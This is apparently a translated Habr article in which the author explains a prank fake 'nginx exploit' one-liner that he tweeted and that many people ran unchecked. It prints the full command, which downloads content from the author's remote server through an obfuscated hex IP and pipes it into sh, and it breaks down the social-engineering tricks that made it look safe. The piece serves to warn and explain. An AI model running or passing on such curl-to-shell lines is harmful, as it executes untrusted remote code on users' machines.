Белешка. трансл.:
ТЛ;ДР: Ни у ком случају немојте користити цевоводе датотека у сх или басх. Ово је одличан начин да изгубите контролу над рачунаром.
Желим да поделим са вама кратку причу о комичној ПоЦ експлоатацији која је настала 31. маја. Одмах се појавио као одговор на вести из
Пошто сам завршио рад на новој техници замагљивања у цурл-у, цитирао сам оригинални твит и „процурео радни ПоЦ“ који се састоји од једне линије кода који наводно користи откривену рањивост. Наравно, ово је била потпуна глупост. Претпостављао сам да ћу одмах бити разоткривен и да ћу у најбољем случају добити пар ретвитова (ма добро).
Међутим, нисам могао да замислим шта се даље догодило. Популарност мог твита је нагло порасла. Изненађујуће, у овом тренутку (15:00 по московском времену 1. јуна) мало људи је схватило да је ово лаж. Многи људи га ретвитују а да га уопште не провере (а камоли да се диве дивној АСЦИИ графики коју даје).
Погледајте само како је лепо!
Иако су све ове петље и боје сјајне, јасно је да су људи морали да покрену код на својој машини да би их видели. Срећом, претраживачи функционишу на исти начин, а у комбинацији са чињеницом да нисам желео да упадам у правне проблеме, код закопан у мојој веб локацији је само упућивао ехо позиве без покушаја да инсталирам или извршим било који додатни код.
Мала дигресија:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Друштвено-електронски инжењеринг (СЕЕ) – више од пуког пхисхинг-а
Сигурност и познавање су били главни део овог експеримента. Мислим да су управо они довели до његовог успеха. Командна линија је јасно подразумевала безбедност позивајући се на „127.0.0.1“ (познати локални хост). Лоцалхост се сматра безбедним и подаци на њему никада не напуштају ваш рачунар.
Познавање је била друга кључна компонента експеримента у ЈИЕ. Пошто су циљну публику првенствено чинили људи упознати са основама рачунарске безбедности, било је важно креирати код тако да делови изгледа познати и познати (а самим тим и сигурни). Позајмљивање елемената старих експлоатских концепата и њихово комбиновање на необичан начин показало се веома успешним.
Испод је детаљна анализа једнолиније. Све на овој листи носи козметичке природе, и практично ништа није потребно за његов стварни рад.
Које компоненте су заиста неопходне? Ово -gsS
, -O 0x0238f06a
, |sh
и самог веб сервера. Веб сервер није садржао никаква злонамерна упутства, већ је једноставно служио АСЦИИ графику користећи команде echo
у писму садржаном у index.html
. Када је корисник унео ред са |sh
у средини, index.html
учитан и извршен. На срећу, чувари веб сервера нису имали зле намере.
-
../../../%00
— представља превазилажење именика; -
ngx_stream_module.so
— путања до насумичног НГИНКС модула; -
/bin/sh%00<'protocol:TCP'
— наводно лансирамо/bin/sh
на циљној машини и преусмерите излаз на ТЦП канал; -
-O 0x0238f06a#PLToffset
- тајни састојак, допуњен#PLToffset
, да изгледа као меморијски офсет на неки начин садржан у ПЛТ-у; -
|sh;
- још један важан фрагмент. Морали смо да преусмеримо излаз на сх/басх да бисмо извршили код који долази са нападачког веб сервера који се налази на0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- лутка у којој се нетцат односи на/dev/tcp/localhost
тако да опет све изгледа сигурно. У ствари, не ради ништа и укључен је у линију за лепоту.
Овим се завршава декодирање скрипте у једном реду и дискусија о аспектима „социо-електронског инжењеринга“ (замршен пхисхинг).
Конфигурација веб сервера и противмере
Пошто су велика већина мојих претплатника инфосец/хакери, одлучио сам да веб сервер учиним мало отпорнијим на изражавање „интересовања“ са њихове стране, само да би момци имали шта да раде (и било би забавно да подесити). Нећу овде да наводим све замке пошто је експеримент још увек у току, али ево неколико ствари које сервер ради:
- Активно прати покушаје дистрибуције на одређеним друштвеним мрежама и замењује разне сличице за преглед како би подстакао корисника да кликне на линк.
- Преусмерава Цхроме/Мозилла/Сафари/итд на промотивни видео Тхугцровд уместо да приказује схелл скрипту.
- Пази на ОЧИТНЕ знакове упада/очигледног хаковања, а затим почиње да преусмерава захтеве на НСА сервере (ха!).
- Инсталира тројанца, као и БИОС рооткит, на све рачунаре чији корисници посећују хост из обичног претраживача (шалим се!).
Мали део антимера
У овом случају, мој једини циљ је био да савладам неке од карактеристика Апацхе-а - посебно, цоол правила за преусмеравање захтева - и помислио сам: зашто да не?
НГИНКС експлоатација (стварно!)
Претплатите се на
Извор: ввв.хабр.цом